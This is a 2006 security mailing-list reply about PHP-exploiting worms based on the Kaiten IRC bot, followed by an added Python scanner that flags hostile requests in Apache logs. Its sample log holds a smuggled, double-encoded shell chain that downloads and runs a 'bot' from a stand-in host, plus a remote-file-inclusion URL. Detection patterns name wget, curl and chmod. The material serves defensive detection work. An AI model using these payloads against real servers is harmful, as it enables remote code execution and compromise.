Message-ID: <43FA1F68.9060506@linuxbox.org>
Date: Mon, 20 Feb 2006 21:58:32 +0200
From: Gadi Evron <ge@...uxbox.org>
To: Marco Monicelli <marco.monicelli@...cegaglia.com>
Cc: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
	bugtraq@...urityfocus.com
Subject: Re: new linux malware


Marco Monicelli wrote:
> Dear Gadi,
> 
> this malware looks like the famous Kaiten IRC bot. If you want, I can send
> the source code of it, but it is already known by most AVs and I think
> the source is public nowadays. This must be just another variant and,
> by the way, it's detected as far as I can see from your quoted information, so
> it shouldn't be dangerous.

Indeed, it has become an annoying trend everybody talks about but nobody 
writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either 
vulnerabilities in known applications such as WordPress, PHPBB, Drupal, 
etc. or actually trying different permutations to attack the site.

Many of these are indeed based on the old kaiten code. As someone 
mentioned previously in this thread or another, it can even be found on 
packet storm.

Still, this one has a kick in the second payload with a worm that also 
attacks other systems, and I can say it is not just yet another PHP worm, 
but actually what I'd call linux malware.

Anyone else seeing their web server logs going crazy with new patterns 
every day? Email me, I am starting a sharing system where these can be 
shared mutually so we can better protect ourselves, create signatures, etc.

> 
> Anyway, tnx for keeping us updated!

:)

	Gadi.

-- 
http://blogs.securiteam.com/

"Out of the box is where I live".
	-- Cara "Starbuck" Thrace, Battlestar Galactica.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
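Gadi's message asks whether others are seeing their web server logs fill up with new attack patterns from PHP-exploiting bots. As an added example, not part of the original message and not code from any tool or project mentioned in the thread, here is a small Python scanner that reads Apache combined-format log lines and flags two of the request shapes the thread describes: a URL passed as a PHP script parameter (the classic remote file inclusion attempt) and shell download-and-run commands smuggled into a query string, including ones hidden behind double percent-encoding. The sample log lines, IP addresses, paths and parameter names are constructed for this example, and the detection heuristics are my own rather than signatures from any AV or IDS.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache "combined" log lines for this example; the hosts,
# paths and parameters are made up and are not taken from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Feb/2006:21:40:11 +0200] "GET /index.php?page=about HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Feb/2006:21:40:15 +0200] "GET /index.php?page=http://203.0.113.7/k.txt? HTTP/1.1" 200 811 "-" "libwww-perl/5.79"
10.0.0.9 - - [20/Feb/2006:21:40:16 +0200] "GET /forum/search.php?q=%2527;cd%20/tmp;wget%20http://203.0.113.7/bot;chmod%20%2bx%20bot;./bot;%2527 HTTP/1.1" 200 12048 "-" "Mozilla/4.0"
10.0.0.12 - - [20/Feb/2006:21:41:02 +0200] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, ident, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Heuristics (assumptions for this example, not a vendor signature set):
# a parameter value that is itself a URL suggests remote file inclusion;
# shell tool names next to command separators suggest download-and-execute.
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.I)
SHELL_TOKENS = re.compile(r'\b(?:wget|curl|chmod|perl|bash)\b|/tmp/', re.I)
SHELL_SEPARATORS = re.compile(r'[;|`]')


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing.

    Returns (decoded, rounds): rounds > 1 means the client double-encoded,
    a common trick to slip past naive one-pass filters.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def split_query(query):
    """Split a raw query string into (name, raw_value) pairs on '&' only.

    Done by hand rather than with parse_qsl so that ';' inside a value,
    which is exactly what a shell payload contains, is never treated as
    a field separator (parse_qsl did that in older Python versions).
    """
    pairs = []
    for field in query.split('&'):
        if field:
            name, _, value = field.partition('=')
            pairs.append((name, value))
    return pairs


def classify_target(target):
    """Return a list of tags describing why a request target looks hostile."""
    tags = []
    query = urlsplit(target).query
    decoded_query, rounds = fully_decode(query)
    for name, raw_value in split_query(query):
        value, _ = fully_decode(raw_value)
        if REMOTE_URL.match(value):
            tags.append('remote-url-in-param:' + name)
    if SHELL_TOKENS.search(decoded_query) and SHELL_SEPARATORS.search(decoded_query):
        tags.append('shell-command-in-query')
    if rounds > 1:
        tags.append('double-encoded')
    return tags


def scan_log(text):
    """Parse log lines and return one finding per request that earned a tag."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        tags = classify_target(m.group('target'))
        if tags:
            findings.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                             'target': m.group('target'), 'tags': tags})
    return findings


def offenders(findings):
    """Count flagged requests per source address."""
    return Counter(f['ip'] for f in findings)


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']} {f['ts']} {', '.join(f['tags'])}\n    {f['target']}")
    print("flagged requests per source:", dict(offenders(hits)))
```

Run against a real access log, the per-source counts are what you would hand to a sharing effort like the one Gadi proposes: the hosts and payload URLs change daily, but the shape (a URL in a parameter, a `wget`/`chmod`/run chain behind `%25`-encoding) is what a signature should key on. The decoder is capped at three rounds so a pathological input cannot keep it spinning.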

